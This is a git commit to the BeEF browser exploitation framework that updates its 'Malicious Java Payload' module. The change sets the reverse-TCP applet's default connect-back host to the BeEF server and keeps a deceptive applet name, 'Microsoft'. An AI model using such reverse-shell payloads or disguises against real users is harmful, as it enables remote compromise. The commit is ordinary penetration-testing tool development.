Updated Malicious Java Payload description.

Changed default connect-back host address to the BeEF host address.



git-svn-id: https://beef.googlecode.com/svn/trunk@1409 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
bcoles@gmail.com
2011-11-06 17:11:15 +00:00
parent 3fadfaf258
commit 16c29cdf53
2 changed files with 5 additions and 4 deletions

View File

@@ -19,11 +19,12 @@ class Java_payload < BeEF::Core::Command
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
end
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
{'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => '192.168.56.1'},
{'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},
{'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666'},
{'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32)},
{'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft'}